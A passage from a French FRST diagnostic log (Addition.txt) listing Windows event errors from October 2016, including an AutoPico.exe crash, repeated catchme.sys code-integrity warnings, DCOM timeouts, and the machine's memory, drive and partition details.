Chemin d’accès du module défaillant: unknown
ID de rapport : 1de512b8-645c-4917-87c8-362fc0938487
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Error: (10/26/2016 12:16:17 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: VAIO-VPC)
Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2147023170 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/18/2016 08:39:53 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.
System Error:
Accès refusé.
.
Error: (10/18/2016 04:29:14 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante AutoPico.exe, version : 12.2.0.0, horodatage : 0x53a73867
Nom du module défaillant : KERNELBASE.dll, version : 10.0.10586.306, horodatage : 0x571af331
Code d’exception : 0xe0434352
Décalage d’erreur : 0x0000000000071f28
ID du processus défaillant : 0x1354
Heure de début de l’application défaillante : 0x01d229545959aa5a
Chemin d’accès de l’application défaillante : C:\Program Files\KMSpico\AutoPico.exe
Chemin d’accès du module défaillant: C:\WINDOWS\system32\KERNELBASE.dll
ID de rapport : 93a82595-2c1e-488b-b3e0-439500baaaed
Nom complet du package défaillant :
ID de l’application relative au package défaillant :
Erreurs système:
=============
Error: (10/30/2016 01:13:42 PM) (Source: DCOM) (EventID: 10010) (User: VAIO-VPC)
Description: Le serveur App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (10/30/2016 01:11:43 PM) (Source: DCOM) (EventID: 10010) (User: VAIO-VPC)
Description: Le serveur App.AppXy9rh3t8m2jfpvhhxp6y2ksgeq77vymbq.mca ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (10/28/2016 11:26:43 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:43 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:42 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:26:42 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:26 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:26 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:17 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
Error: (10/28/2016 11:23:17 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Users\UTILIS~1\AppData\Local\Temp\catchme.sys
CodeIntegrity:
===================================
Date: 2016-10-28 12:26:43.133
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:43.100
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:42.758
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:26:42.714
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:26.940
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:26.909
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:17.060
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:17.029
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:16.649
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-10-28 12:23:16.618
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\UTILISATEUR\AppData\Local\Temp\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i3 CPU M 380 @ 2.53GHz
Pourcentage de mémoire utilisée: 48%
Mémoire physique - RAM - totale: 2798.09 MB
Mémoire physique - RAM - disponible: 1452.81 MB
Mémoire virtuelle totale: 5614.09 MB
Mémoire virtuelle disponible: 4218.83 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:297.55 GB) (Free:233.19 GB) NTFS
Drive e: (DISQUE LULU) (Fixed) (Total:298.02 GB) (Free:26.86 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: 51BF1D92)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=297.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (Size: 298.1 GB) (Disk ID: 77850B07)
Partition 1: (Not Active) - (Size=298.1 GB) - (Type=0B)
==================== Fin de Addition.txt ============================